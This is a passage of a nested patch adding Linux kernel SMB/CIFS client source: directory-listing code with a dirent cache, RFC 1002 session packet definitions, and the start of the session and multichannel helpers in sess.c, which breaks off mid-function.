++	 * servers do not return . and .. for the root of a drive, and
++	 * for those we need to start two entries earlier.
++	 */
++
++	dump_cifs_file_struct(file, "In fce ");
++	if (((index_to_find < cfile->srch_inf.index_of_last_entry) &&
++	     is_dir_changed(file)) || (index_to_find < first_entry_in_buffer)) {
++		/* close and restart search */
++		cifs_dbg(FYI, "search backing up - close and restart search\n");
++		spin_lock(&cfile->file_info_lock);
++		if (server->ops->dir_needs_close(cfile)) {
++			cfile->invalidHandle = true;
++			spin_unlock(&cfile->file_info_lock);
++			if (server->ops->close_dir)
++				server->ops->close_dir(xid, tcon, &cfile->fid);
++		} else
++			spin_unlock(&cfile->file_info_lock);
++		if (cfile->srch_inf.ntwrk_buf_start) {
++			cifs_dbg(FYI, "freeing SMB ff cache buf on search rewind\n");
++			if (cfile->srch_inf.smallBuf)
++				cifs_small_buf_release(cfile->srch_inf.
++						ntwrk_buf_start);
++			else
++				cifs_buf_release(cfile->srch_inf.
++						ntwrk_buf_start);
++			cfile->srch_inf.ntwrk_buf_start = NULL;
++		}
++		rc = initiate_cifs_search(xid, file, full_path);
++		if (rc) {
++			cifs_dbg(FYI, "error %d reinitiating a search on rewind\n",
++				 rc);
++			return rc;
++		}
++		/* FindFirst/Next set last_entry to NULL on malformed reply */
++		if (cfile->srch_inf.last_entry)
++			cifs_save_resume_key(cfile->srch_inf.last_entry, cfile);
++	}
++
++	search_flags = CIFS_SEARCH_CLOSE_AT_END | CIFS_SEARCH_RETURN_RESUME;
++	if (backup_cred(cifs_sb))
++		search_flags |= CIFS_SEARCH_BACKUP_SEARCH;
++
++	while ((index_to_find >= cfile->srch_inf.index_of_last_entry) &&
++	       (rc == 0) && !cfile->srch_inf.endOfSearch) {
++		cifs_dbg(FYI, "calling findnext2\n");
++		rc = server->ops->query_dir_next(xid, tcon, &cfile->fid,
++						 search_flags,
++						 &cfile->srch_inf);
++		/* FindFirst/Next set last_entry to NULL on malformed reply */
++		if (cfile->srch_inf.last_entry)
++			cifs_save_resume_key(cfile->srch_inf.last_entry, cfile);
++		if (rc)
++			return -ENOENT;
++	}
++	if (index_to_find < cfile->srch_inf.index_of_last_entry) {
++		/* we found the buffer that contains the entry */
++		/* scan and find it */
++		int i;
++		char *cur_ent;
++		char *end_of_smb;
++
++		if (cfile->srch_inf.ntwrk_buf_start == NULL) {
++			cifs_dbg(VFS, "ntwrk_buf_start is NULL during readdir\n");
++			return -EIO;
++		}
++
++		end_of_smb = cfile->srch_inf.ntwrk_buf_start +
++			server->ops->calc_smb_size(
++					cfile->srch_inf.ntwrk_buf_start);
++
++		cur_ent = cfile->srch_inf.srch_entries_start;
++		first_entry_in_buffer = cfile->srch_inf.index_of_last_entry
++					- cfile->srch_inf.entries_in_buffer;
++		pos_in_buf = index_to_find - first_entry_in_buffer;
++		cifs_dbg(FYI, "found entry - pos_in_buf %d\n", pos_in_buf);
++
++		for (i = 0; (i < (pos_in_buf)) && (cur_ent != NULL); i++) {
++			/* go entry by entry figuring out which is first */
++			cur_ent = nxt_dir_entry(cur_ent, end_of_smb,
++						cfile->srch_inf.info_level);
++		}
++		if ((cur_ent == NULL) && (i < pos_in_buf)) {
++			/* BB fixme - check if we should flag this error */
++			cifs_dbg(VFS, "reached end of buf searching for pos in buf %d index to find %lld rc %d\n",
++				 pos_in_buf, index_to_find, rc);
++		}
++		rc = 0;
++		*current_entry = cur_ent;
++	} else {
++		cifs_dbg(FYI, "index not in buffer - could not findnext into it\n");
++		return 0;
++	}
++
++	if (pos_in_buf >= cfile->srch_inf.entries_in_buffer) {
++		cifs_dbg(FYI, "can not return entries pos_in_buf beyond last\n");
++		*num_to_ret = 0;
++	} else
++		*num_to_ret = cfile->srch_inf.entries_in_buffer - pos_in_buf;
++
++	return rc;
++}
++
++static bool emit_cached_dirents(struct cached_dirents *cde,
++				struct dir_context *ctx)
++{
++	struct cached_dirent *dirent;
++	bool rc;
++
++	list_for_each_entry(dirent, &cde->entries, entry) {
++		/*
++		 * Skip all early entries prior to the current lseek()
++		 * position.
++		 */
++		if (ctx->pos > dirent->pos)
++			continue;
++		/*
++		 * We recorded the current ->pos value for the dirent
++		 * when we stored it in the cache.
++		 * However, this sequence of ->pos values may have holes
++		 * in it, for example because dot-dirs returned from the
++		 * server are suppressed.
++		 * Handle this by forcing ctx->pos to be the same as the
++		 * ->pos of the current dirent we emit from the cache.
++		 * This means that when we emit these entries from the cache
++		 * we now emit them with the same ->pos value as in the
++		 * initial scan.
++		 */
++		ctx->pos = dirent->pos;
++		rc = dir_emit(ctx, dirent->name, dirent->namelen,
++			      dirent->fattr.cf_uniqueid,
++			      dirent->fattr.cf_dtype);
++		if (!rc)
++			return rc;
++		ctx->pos++;
++	}
++	return true;
++}
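++
++/*
++ * Worked example (illustrative): suppose the initial scan cached
++ * entries at pos 2, 3 and 5, with pos 4 absent because a server
++ * dot-dir was suppressed. On a later read with ctx->pos == 4, the
++ * loop above skips the entries at 2 and 3, snaps ctx->pos to 5 for
++ * the next cached dirent, and emits it with the same pos value as
++ * the initial scan.
++ */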
++
++static void update_cached_dirents_count(struct cached_dirents *cde,
++					struct dir_context *ctx)
++{
++	if (cde->ctx != ctx)
++		return;
++	if (cde->is_valid || cde->is_failed)
++		return;
++
++	cde->pos++;
++}
++
++static void finished_cached_dirents_count(struct cached_dirents *cde,
++					struct dir_context *ctx)
++{
++	if (cde->ctx != ctx)
++		return;
++	if (cde->is_valid || cde->is_failed)
++		return;
++	if (ctx->pos != cde->pos)
++		return;
++
++	cde->is_valid = 1;
++}
++
++static void add_cached_dirent(struct cached_dirents *cde,
++			      struct dir_context *ctx,
++			      const char *name, int namelen,
++			      struct cifs_fattr *fattr)
++{
++	struct cached_dirent *de;
++
++	if (cde->ctx != ctx)
++		return;
++	if (cde->is_valid || cde->is_failed)
++		return;
++	if (ctx->pos != cde->pos) {
++		cde->is_failed = 1;
++		return;
++	}
++	de = kzalloc(sizeof(*de), GFP_ATOMIC);
++	if (de == NULL) {
++		cde->is_failed = 1;
++		return;
++	}
++	de->namelen = namelen;
++	de->name = kstrndup(name, namelen, GFP_ATOMIC);
++	if (de->name == NULL) {
++		kfree(de);
++		cde->is_failed = 1;
++		return;
++	}
++	de->pos = ctx->pos;
++
++	memcpy(&de->fattr, fattr, sizeof(struct cifs_fattr));
++
++	list_add_tail(&de->entry, &cde->entries);
++}
++
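++/*
++ * Emit one entry to the VFS and, if we hold an open cached directory
++ * handle, also record it in the dirent cache so that a later readdir
++ * of the same directory can be served without going to the server.
++ */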
++static bool cifs_dir_emit(struct dir_context *ctx,
++			  const char *name, int namelen,
++			  struct cifs_fattr *fattr,
++			  struct cached_fid *cfid)
++{
++	bool rc;
++	ino_t ino = cifs_uniqueid_to_ino_t(fattr->cf_uniqueid);
++
++	rc = dir_emit(ctx, name, namelen, ino, fattr->cf_dtype);
++	if (!rc)
++		return rc;
++
++	if (cfid) {
++		mutex_lock(&cfid->dirents.de_mutex);
++		add_cached_dirent(&cfid->dirents, ctx, name, namelen,
++				  fattr);
++		mutex_unlock(&cfid->dirents.de_mutex);
++	}
++
++	return rc;
++}
++
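++/*
++ * Parse one raw search entry from the network buffer, convert the name
++ * from UTF-16 if necessary, build a cifs_fattr appropriate for the
++ * negotiated info level, prime the dcache and hand the entry to
++ * cifs_dir_emit().
++ */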
++static int cifs_filldir(char *find_entry, struct file *file,
++			struct dir_context *ctx,
++			char *scratch_buf, unsigned int max_len,
++			struct cached_fid *cfid)
++{
++	struct cifsFileInfo *file_info = file->private_data;
++	struct super_block *sb = file_inode(file)->i_sb;
++	struct cifs_sb_info *cifs_sb = CIFS_SB(sb);
++	struct cifs_dirent de = { NULL, };
++	struct cifs_fattr fattr;
++	struct qstr name;
++	int rc = 0;
++
++	rc = cifs_fill_dirent(&de, find_entry, file_info->srch_inf.info_level,
++			      file_info->srch_inf.unicode);
++	if (rc)
++		return rc;
++
++	if (de.namelen > max_len) {
++		cifs_dbg(VFS, "bad search response length %zd past smb end\n",
++			 de.namelen);
++		return -EINVAL;
++	}
++
++	/* skip . and .. since we added them first */
++	if (cifs_entry_is_dot(&de, file_info->srch_inf.unicode))
++		return 0;
++
++	if (file_info->srch_inf.unicode) {
++		struct nls_table *nlt = cifs_sb->local_nls;
++		int map_type;
++
++		map_type = cifs_remap(cifs_sb);
++		name.name = scratch_buf;
++		name.len =
++			cifs_from_utf16((char *)name.name, (__le16 *)de.name,
++					UNICODE_NAME_MAX,
++					min_t(size_t, de.namelen,
++					      (size_t)max_len), nlt, map_type);
++		name.len -= nls_nullsize(nlt);
++	} else {
++		name.name = de.name;
++		name.len = de.namelen;
++	}
++
++	switch (file_info->srch_inf.info_level) {
++	case SMB_FIND_FILE_POSIX_INFO:
++		cifs_posix_to_fattr(&fattr,
++				    (struct smb2_posix_info *)find_entry,
++				    cifs_sb);
++		break;
++	case SMB_FIND_FILE_UNIX:
++		cifs_unix_basic_to_fattr(&fattr,
++					 &((FILE_UNIX_INFO *)find_entry)->basic,
++					 cifs_sb);
++		if (S_ISLNK(fattr.cf_mode))
++			fattr.cf_flags |= CIFS_FATTR_NEED_REVAL;
++		break;
++	case SMB_FIND_FILE_INFO_STANDARD:
++		cifs_std_info_to_fattr(&fattr,
++				       (FIND_FILE_STANDARD_INFO *)find_entry,
++				       cifs_sb);
++		break;
++	case SMB_FIND_FILE_ID_FULL_DIR_INFO:
++		cifs_fulldir_info_to_fattr(&fattr,
++					   (SEARCH_ID_FULL_DIR_INFO *)find_entry,
++					   cifs_sb);
++		break;
++	default:
++		cifs_dir_info_to_fattr(&fattr,
++				       (FILE_DIRECTORY_INFO *)find_entry,
++				       cifs_sb);
++		break;
++	}
++
++	if (de.ino && (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_SERVER_INUM)) {
++		fattr.cf_uniqueid = de.ino;
++	} else {
++		fattr.cf_uniqueid = iunique(sb, ROOT_I);
++		cifs_autodisable_serverino(cifs_sb);
++	}
++
++	if ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_MF_SYMLINKS) &&
++	    couldbe_mf_symlink(&fattr))
++		/*
++		 * fetching the type and mode can be slow, so just treat
++		 * these as regular files for now and mark them for
++		 * revalidation
++		 */
++		fattr.cf_flags |= CIFS_FATTR_NEED_REVAL;
++
++	cifs_prime_dcache(file_dentry(file), &name, &fattr);
++
++	return !cifs_dir_emit(ctx, name.name, name.len,
++			      &fattr, cfid);
++}
++
++
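++/*
++ * Main readdir entry point. Fast path: if a cached directory handle
++ * exists and its dirent cache is complete, emit entries straight from
++ * the cache. Slow path: run (or resume) a server-side search, fill the
++ * caller's buffer entry by entry and opportunistically populate the
++ * dirent cache for the next reader.
++ */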
++int cifs_readdir(struct file *file, struct dir_context *ctx)
++{
++	int rc = 0;
++	unsigned int xid;
++	int i;
++	struct tcon_link *tlink = NULL;
++	struct cifs_tcon *tcon;
++	struct cifsFileInfo *cifsFile;
++	char *current_entry;
++	int num_to_fill = 0;
++	char *tmp_buf = NULL;
++	char *end_of_smb;
++	unsigned int max_len;
++	const char *full_path;
++	void *page = alloc_dentry_path();
++	struct cached_fid *cfid = NULL;
++	struct cifs_sb_info *cifs_sb = CIFS_FILE_SB(file);
++
++	xid = get_xid();
++
++	full_path = build_path_from_dentry(file_dentry(file), page);
++	if (IS_ERR(full_path)) {
++		rc = PTR_ERR(full_path);
++		goto rddir2_exit;
++	}
++
++	if (file->private_data == NULL) {
++		tlink = cifs_sb_tlink(cifs_sb);
++		if (IS_ERR(tlink))
++			goto cache_not_found;
++		tcon = tlink_tcon(tlink);
++	} else {
++		cifsFile = file->private_data;
++		tcon = tlink_tcon(cifsFile->tlink);
++	}
++
++	rc = open_cached_dir(xid, tcon, full_path, cifs_sb, false, &cfid);
++	cifs_put_tlink(tlink);
++	if (rc)
++		goto cache_not_found;
++
++	mutex_lock(&cfid->dirents.de_mutex);
++	/*
++	 * If this read starts from the beginning of the directory,
++	 * initialize the scan and start caching the directory
++	 * content.
++	 */
++	if (ctx->pos == 0 && cfid->dirents.ctx == NULL) {
++		cfid->dirents.ctx = ctx;
++		cfid->dirents.pos = 2;
++	}
++	/*
++	 * If we already have the entire directory cached then
++	 * we can just serve the cache.
++	 */
++	if (cfid->dirents.is_valid) {
++		if (!dir_emit_dots(file, ctx)) {
++			mutex_unlock(&cfid->dirents.de_mutex);
++			goto rddir2_exit;
++		}
++		emit_cached_dirents(&cfid->dirents, ctx);
++		mutex_unlock(&cfid->dirents.de_mutex);
++		goto rddir2_exit;
++	}
++	mutex_unlock(&cfid->dirents.de_mutex);
++
++	/* Drop the cache while calling initiate_cifs_search and
++	 * find_cifs_entry in case there are reconnects during
++	 * query_directory.
++	 */
++	close_cached_dir(cfid);
++	cfid = NULL;
++
++ cache_not_found:
++	/*
++	 * Ensure FindFirst doesn't fail before doing filldir() for '.' and
++	 * '..'. Otherwise we won't be able to notify VFS in case of failure.
++	 */
++	if (file->private_data == NULL) {
++		rc = initiate_cifs_search(xid, file, full_path);
++		cifs_dbg(FYI, "initiate cifs search rc %d\n", rc);
++		if (rc)
++			goto rddir2_exit;
++	}
++
++	if (!dir_emit_dots(file, ctx))
++		goto rddir2_exit;
++
++	/*
++	 * 1) If a search is already active, is the requested entry in the
++	 * current search buffer? If it lies before the buffer, restart the
++	 * search; if it lies after, keep searching until we find it.
++	 */
++	cifsFile = file->private_data;
++	if (cifsFile->srch_inf.endOfSearch) {
++		if (cifsFile->srch_inf.emptyDir) {
++			cifs_dbg(FYI, "End of search, empty dir\n");
++			rc = 0;
++			goto rddir2_exit;
++		}
++	} /* else {
++		cifsFile->invalidHandle = true;
++		tcon->ses->server->close(xid, tcon, &cifsFile->fid);
++	} */
++
++	tcon = tlink_tcon(cifsFile->tlink);
++	rc = find_cifs_entry(xid, tcon, ctx->pos, file, full_path,
++			     &current_entry, &num_to_fill);
++	open_cached_dir(xid, tcon, full_path, cifs_sb, false, &cfid);
++	if (rc) {
++		cifs_dbg(FYI, "fce error %d\n", rc);
++		goto rddir2_exit;
++	} else if (current_entry != NULL) {
++		cifs_dbg(FYI, "entry %lld found\n", ctx->pos);
++	} else {
++		if (cfid) {
++			mutex_lock(&cfid->dirents.de_mutex);
++			finished_cached_dirents_count(&cfid->dirents, ctx);
++			mutex_unlock(&cfid->dirents.de_mutex);
++		}
++		cifs_dbg(FYI, "Could not find entry\n");
++		goto rddir2_exit;
++	}
++	cifs_dbg(FYI, "loop through %d times filling dir for net buf %p\n",
++		 num_to_fill, cifsFile->srch_inf.ntwrk_buf_start);
++	max_len = tcon->ses->server->ops->calc_smb_size(
++			cifsFile->srch_inf.ntwrk_buf_start);
++	end_of_smb = cifsFile->srch_inf.ntwrk_buf_start + max_len;
++
++	tmp_buf = kmalloc(UNICODE_NAME_MAX, GFP_KERNEL);
++	if (tmp_buf == NULL) {
++		rc = -ENOMEM;
++		goto rddir2_exit;
++	}
++
++	for (i = 0; i < num_to_fill; i++) {
++		if (current_entry == NULL) {
++			/* evaluate whether this case is an error */
++			cifs_dbg(VFS, "past SMB end,  num to fill %d i %d\n",
++				 num_to_fill, i);
++			break;
++		}
++		/*
++		 * if buggy server returns . and .. late do we want to
++		 * check for that here?
++		 */
++		*tmp_buf = 0;
++		rc = cifs_filldir(current_entry, file, ctx,
++				  tmp_buf, max_len, cfid);
++		if (rc) {
++			if (rc > 0)
++				rc = 0;
++			break;
++		}
++
++		ctx->pos++;
++		if (cfid) {
++			mutex_lock(&cfid->dirents.de_mutex);
++			update_cached_dirents_count(&cfid->dirents, ctx);
++			mutex_unlock(&cfid->dirents.de_mutex);
++		}
++
++		if (ctx->pos ==
++			cifsFile->srch_inf.index_of_last_entry) {
++			cifs_dbg(FYI, "last entry in buf at pos %lld %s\n",
++				 ctx->pos, tmp_buf);
++			cifs_save_resume_key(current_entry, cifsFile);
++			break;
++		}
++		current_entry =
++			nxt_dir_entry(current_entry, end_of_smb,
++				      cifsFile->srch_inf.info_level);
++	}
++	kfree(tmp_buf);
++
++rddir2_exit:
++	if (cfid)
++		close_cached_dir(cfid);
++	free_dentry_path(page);
++	free_xid(xid);
++	return rc;
++}
+diff --git a/fs/smb/client/rfc1002pdu.h b/fs/smb/client/rfc1002pdu.h
+new file mode 100644
+index 0000000000000..ae1d025da294a
+--- /dev/null
++++ b/fs/smb/client/rfc1002pdu.h
+@@ -0,0 +1,61 @@
++/* SPDX-License-Identifier: LGPL-2.1 */
++/*
++ *
++ *   Protocol Data Unit definitions for RFC 1001/1002 support
++ *
++ *   Copyright (c) International Business Machines  Corp., 2004
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ */
++
++/* NB: unlike smb/cifs packets, the RFC1002 structures are big endian */
++
++	/* RFC 1002 session packet types */
++#define RFC1002_SESSION_MESSAGE 0x00
++#define RFC1002_SESSION_REQUEST  0x81
++#define RFC1002_POSITIVE_SESSION_RESPONSE 0x82
++#define RFC1002_NEGATIVE_SESSION_RESPONSE 0x83
++#define RFC1002_RETARGET_SESSION_RESPONSE 0x84
++#define RFC1002_SESSION_KEEP_ALIVE 0x85
++
++	/* RFC 1002 flags (only one defined) */
++#define RFC1002_LENGTH_EXTEND 0x80 /* high order bit of length (ie +64K) */
++
++struct rfc1002_session_packet {
++	__u8	type;
++	__u8	flags;
++	__u16	length;
++	union {
++		struct {
++			__u8 called_len;
++			__u8 called_name[32];
++			__u8 scope1; /* null */
++			__u8 calling_len;
++			__u8 calling_name[32];
++			__u8 scope2; /* null */
++		} __attribute__((packed)) session_req;
++		struct {
++			__u32 retarget_ip_addr;
++			__u16 port;
++		} __attribute__((packed)) retarget_resp;
++		__u8 neg_ses_resp_error_code;
++		/* POSITIVE_SESSION_RESPONSE packet does not include trailer.
++		SESSION_KEEP_ALIVE packet also does not include a trailer.
++		Trailer for the SESSION_MESSAGE packet is the SMB/CIFS header */
++	} __attribute__((packed)) trailer;
++} __attribute__((packed));
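++
++/*
++ * Note that the 16-bit length field is big endian on the wire and that
++ * RFC1002_LENGTH_EXTEND in the flags byte supplies a 17th, high-order
++ * length bit. A hypothetical decode of the total payload length (a
++ * sketch for illustration only, not part of this patch):
++ *
++ *	len = be16_to_cpu((__force __be16)pkt->length);
++ *	if (pkt->flags & RFC1002_LENGTH_EXTEND)
++ *		len += 0x10000;
++ */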
++
++/* Negative Session Response error codes */
++#define RFC1002_NOT_LISTENING_CALLED  0x80 /* not listening on called name */
++#define RFC1002_NOT_LISTENING_CALLING 0x81 /* not listening on calling name */
++#define RFC1002_NOT_PRESENT           0x82 /* called name not present */
++#define RFC1002_INSUFFICIENT_RESOURCE 0x83
++#define RFC1002_UNSPECIFIED_ERROR     0x8F
++
++/* RFC 1002 Datagram service packets are not defined here as they
++are not needed for the network filesystem client unless we plan on
++implementing broadcast resolution of the server ip address (from
++server netbios name). Currently server names are resolved only via DNS
++(tcp name) or ip address or an /etc/hosts equivalent mapping to ip address. */
++
++#define DEFAULT_CIFS_CALLED_NAME  "*SMBSERVER      "
+diff --git a/fs/smb/client/sess.c b/fs/smb/client/sess.c
+new file mode 100644
+index 0000000000000..81be17845072a
+--- /dev/null
++++ b/fs/smb/client/sess.c
+@@ -0,0 +1,1858 @@
++// SPDX-License-Identifier: LGPL-2.1
++/*
++ *
++ *   SMB/CIFS session setup handling routines
++ *
++ *   Copyright (c) International Business Machines  Corp., 2006, 2009
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *
++ */
++
++#include "cifspdu.h"
++#include "cifsglob.h"
++#include "cifsproto.h"
++#include "cifs_unicode.h"
++#include "cifs_debug.h"
++#include "ntlmssp.h"
++#include "nterr.h"
++#include <linux/utsname.h>
++#include <linux/slab.h>
++#include <linux/version.h>
++#include "cifsfs.h"
++#include "cifs_spnego.h"
++#include "smb2proto.h"
++#include "fs_context.h"
++
++static int
++cifs_ses_add_channel(struct cifs_sb_info *cifs_sb, struct cifs_ses *ses,
++		     struct cifs_server_iface *iface);
++
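++/*
++ * Compare the server's destination address against the given interface
++ * address: true only when both the address family and the IPv4/IPv6
++ * address itself match.
++ */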
++bool
++is_server_using_iface(struct TCP_Server_Info *server,
++		      struct cifs_server_iface *iface)
++{
++	struct sockaddr_in *i4 = (struct sockaddr_in *)&iface->sockaddr;
++	struct sockaddr_in6 *i6 = (struct sockaddr_in6 *)&iface->sockaddr;
++	struct sockaddr_in *s4 = (struct sockaddr_in *)&server->dstaddr;
++	struct sockaddr_in6 *s6 = (struct sockaddr_in6 *)&server->dstaddr;
++
++	if (server->dstaddr.ss_family != iface->sockaddr.ss_family)
++		return false;
++	if (server->dstaddr.ss_family == AF_INET) {
++		if (s4->sin_addr.s_addr != i4->sin_addr.s_addr)
++			return false;
++	} else if (server->dstaddr.ss_family == AF_INET6) {
++		if (memcmp(&s6->sin6_addr, &i6->sin6_addr,
++			   sizeof(i6->sin6_addr)) != 0)
++			return false;
++	} else {
++		/* unknown family.. */
++		return false;
++	}
++	return true;
++}
++
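++/* Return true if any channel of @ses is currently bound to @iface. */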
++bool is_ses_using_iface(struct cifs_ses *ses, struct cifs_server_iface *iface)
++{
++	int i;
++
++	spin_lock(&ses->chan_lock);
++	for (i = 0; i < ses->chan_count; i++) {
++		if (ses->chans[i].iface == iface) {
++			spin_unlock(&ses->chan_lock);
++			return true;
++		}
++	}
++	spin_unlock(&ses->chan_lock);
++	return false;
++}
++
++/* Channel helper functions. It is assumed that chan_lock is held by the caller. */
++
++unsigned int
++cifs_ses_get_chan_index(struct cifs_ses *ses,
++			struct TCP_Server_Info *server)
++{
++	unsigned int i;
++
++	for (i = 0; i < ses->chan_count; i++) {
++		if (ses->chans[i].server == server)
++			return i;
++	}
++
++	/* If we didn't find the channel, it is likely a bug */
++	if (server)
++		cifs_dbg(VFS, "unable to get chan index for server: 0x%llx",
++			 server->conn_id);
++	WARN_ON(1);
++	return 0;
++}
++
++void
++cifs_chan_set_in_reconnect(struct cifs_ses *ses,
++			     struct TCP_Server_Info *server)
++{
++	unsigned int chan_index = cifs_ses_get_chan_index(ses, server);
++
++	ses->chans[chan_index].in_reconnect = true;
++}
++
++void
++cifs_chan_clear_in_reconnect(struct cifs_ses *ses,
++			     struct TCP_Server_Info *server)
++{
++	unsigned int chan_index = cifs_ses_get_chan_index(ses, server);
++
++	ses->chans[chan_index].in_reconnect = false;
++}
++
++bool
++cifs_chan_in_reconnect(struct cifs_ses *ses,
++			  struct TCP_Server_Info *server)
++{
++	unsigned int chan_index = cifs_ses_get_chan_index(ses, server);
++
++	return CIFS_CHAN_IN_RECONNECT(ses, chan_index);
++}
++
++void
++cifs_chan_set_need_reconnect(struct cifs_ses *ses,
++			     struct TCP_Server_Info *server)
++{
++	unsigned int chan_index = cifs_ses_get_chan_index(ses, server);
++
++	set_bit(chan_index, &ses->chans_need_reconnect);
++	cifs_dbg(FYI, "Set reconnect bitmask for chan %u; now 0x%lx\n",
++		 chan_index, ses->chans_need_reconnect);
++}
++
++void
++cifs_chan_clear_need_reconnect(struct cifs_ses *ses,
++			       struct TCP_Server_Info *server)
++{
++	unsigned int chan_index = cifs_ses_get_chan_index(ses, server);
++
++	clear_bit(chan_index, &ses->chans_need_reconnect);
++	cifs_dbg(FYI, "Cleared reconnect bitmask for chan %u; now 0x%lx\n",
++		 chan_index, ses->chans_need_reconnect);
++}
++
++bool
++cifs_chan_needs_reconnect(struct cifs_ses *ses,
++			  struct TCP_Server_Info *server)
++{
++	unsigned int chan_index = cifs_ses_get_chan_index(ses, server);
++
++	return CIFS_CHAN_NEEDS_RECONNECT(ses, chan_index);
++}
++
++bool
++cifs_chan_is_iface_active(struct cifs_ses *ses,
++			  struct TCP_Server_Info *server)
++{
++	unsigned int chan_index = cifs_ses_get_chan_index(ses, server);
++
++	return ses->chans[chan_index].iface &&
++		ses->chans[chan_index].iface->is_active;
++}
++
++/* returns number of channels added */
++int cifs_try_adding_channels(struct cifs_sb_info *cifs_sb, struct cifs_ses *ses)
++{
++	struct TCP_Server_Info *server = ses->server;
++	int old_chan_count, new_chan_count;
++	int left;
++	int rc = 0;
++	int tries = 0;
++	struct cifs_server_iface *iface = NULL, *niface = NULL;
++
++	spin_lock(&ses->chan_lock);
++
++	new_chan_count = old_chan_count = ses->chan_count;
++	left = ses->chan_max - ses->chan_count;
++
++	if (left <= 0) {
++		spin_unlock(&ses->chan_lock);
++		cifs_dbg(FYI,
++			 "ses already at max_channels (%zu), nothing to open\n",
++			 ses->chan_max);
++		return 0;
++	}
++
++	if (server->dialect < SMB30_PROT_ID) {
++		spin_unlock(&ses->chan_lock);
++		cifs_dbg(VFS, "multichannel is not supported on this protocol version, use 3.0 or above\n");
++		return 0;
++	}
++
++	if (!(server->capabilities & SMB2_GLOBAL_CAP_MULTI_CHANNEL)) {
++		ses->chan_max = 1;
++		spin_unlock(&ses->chan_lock);
++		cifs_server_dbg(VFS, "no multichannel support\n");
++		return 0;
++	}
++	spin_unlock(&ses->chan_lock);
++
++	/*
++	 * Keep connecting to the same, fastest, iface for all channels as
++	 * long as it's RSS-capable. Try the next fastest one if it is not,
++	 * or if channel creation fails.
++	 */
++	spin_lock(&ses->iface_lock);
++	iface = list_first_entry(&ses->iface_list, struct cifs_server_iface,
++				 iface_head);
++	spin_unlock(&ses->iface_lock);
++
++	while (left > 0) {
++
++		tries++;
++		if (tries > 3*ses->chan_max) {
++			cifs_dbg(FYI, "too many channel open attempts (%d channels left to open)\n",
++				 left);
++			break;
++		}
++
++		spin_lock(&ses->iface_lock);
++		if (!ses->iface_count) {
++			spin_unlock(&ses->iface_lock);
++			break;
++		}
++
++		list_for_each_entry_safe_from(iface, niface, &ses->iface_list,
++				    iface_head) {
++			/* skip ifaces that are unusable */
++			if (!iface->is_active ||
++			    (is_ses_using_iface(ses, iface) &&
++			     !iface->rss_capable)) {
++				continue;
++			}
++
++			/* take ref before unlock */
++			kref_get(&iface->refcount);
++
++			spin_unlock(&ses->iface_lock);
++			rc = cifs_ses_add_channel(cifs_sb, ses, iface);
++			spin_lock(&ses->iface_lock);
++
++			if (rc) {
++				cifs_dbg(VFS, "failed to open extra channel on iface:%pIS rc=%d\n",
++					 &iface->sockaddr,
++					 rc);
++				kref_put(&iface->refcount, release_iface);
++				continue;
++			}
++
++			cifs_dbg(FYI, "successfully opened new channel on iface:%pIS\n",
++				 &iface->sockaddr);
++			break;
++		}
++		spin_unlock(&ses->iface_lock);
++
++		left--;
++		new_chan_count++;
++	}
++
++	return new_chan_count - old_chan_count;
++}
++
++/*
++ * update the iface for the channel if necessary.
++ * will return 0 when the iface is updated, 1 if removed, 2 otherwise.
++ * Must be called with chan_lock held.
++ */
++int
++cifs_chan_update_iface(struct cifs_ses *ses, struct TCP_Server_Info *server)
++{
++	unsigned int chan_index;
++	struct cifs_server_iface *iface = NULL;
++	struct cifs_server_iface *old_iface = NULL;
++	int rc = 0;
++
++	spin_lock(&ses->chan_lock);
++	chan_index = cifs_ses_get_chan_index(ses, server);
++	if (!chan_index) {
++		spin_unlock(&ses->chan_lock);
++		return 0;
++	}
++
++	if (ses->chans[chan_index].iface) {
++		old_iface = ses->chans[chan_index].iface;
++		if (old_iface->is_active) {
++			spin_unlock(&ses->chan_lock);
++			return 1;
++		}
++	}
++	spin_unlock(&ses->chan_lock);
++
++	spin_lock(&ses->iface_lock);
++	/* then look for a new one */
++	list_for_each_entry(iface, &ses->iface_list, iface_head) {
++		if (!iface->is_active ||
++		    (is_ses_using_iface(ses, iface) &&
++		     !iface->rss_capable)) {
++			continue;
++		}
++		kref_get(&iface->refcount);
++		break;
++	}
++
++	if (list_entry_is_head(iface, &ses->iface_list, iface_head)) {
++		rc = 1;
++		iface = NULL;
++		cifs_dbg(FYI, "unable to find a suitable iface\n");
++	}
++
++	/* now drop the ref to the current iface */
++	if (old_iface && iface) {
++		cifs_dbg(FYI, "replacing iface: %pIS with %pIS\n",
++			 &old_iface->sockaddr,
++			 &iface->sockaddr);
++		kref_put(&old_iface->refcount, release_iface);
++	} else if (old_iface) {
++		cifs_dbg(FYI, "releasing ref to iface: %pIS\n",
++			 &old_iface->sockaddr);
++		kref_put(&old_iface->refcount, release_iface);
++	} else {
++		WARN_ON(!iface);
++		cifs_dbg(FYI, "adding new iface: %pIS\n", &iface->sockaddr);
++	}
++	spin_unlock(&ses->iface_lock);
++
++	spin_lock(&ses->chan_lock);
++	chan_index = cifs_ses_get_chan_index(ses, server);
++	ses->chans[chan_index].iface = iface;
++
++	/* No iface was found. If this is a secondary channel, drop the connection */
++	if (!iface && CIFS_SERVER_IS_CHAN(server))
++		ses->chans[chan_index].server = NULL;
++
++	spin_unlock(&ses->chan_lock);
++
++	if (!iface && CIFS_SERVER_IS_CHAN(server))
++		cifs_put_tcp_session(server, false);
++
++	return rc;
++}
++
++/*
++ * If server is a channel of ses, return the corresponding enclosing
++ * cifs_chan otherwise return NULL.
++ */
++struct cifs_chan *
++cifs_ses_find_chan(struct cifs_ses *ses, struct TCP_Server_Info *server)
++{
++	int i;
++
++	spin_lock(&ses->chan_lock);
++	for (i = 0; i < ses->chan_count; i++) {
++		if (ses->chans[i].server == server) {
++			spin_unlock(&ses->chan_lock);
++			return &ses->chans[i];
++		}
++	}
++	spin_unlock(&ses->chan_lock);
++	return NULL;
++}
++
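++/*
++ * Open an extra transport connection to @iface and bind it to @ses as
++ * a new channel: clone the relevant parts of the mount context, get a
++ * TCP session, then negotiate and perform session setup over the new
++ * connection. On failure the partially set up channel is torn down.
++ */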
++static int
++cifs_ses_add_channel(struct cifs_sb_info *cifs_sb, struct cifs_ses *ses,
++		     struct cifs_server_iface *iface)
++{
++	struct TCP_Server_Info *chan_server;
++	struct cifs_chan *chan;
++	struct smb3_fs_context ctx = {NULL};
++	static const char unc_fmt[] = "\\%s\\foo";
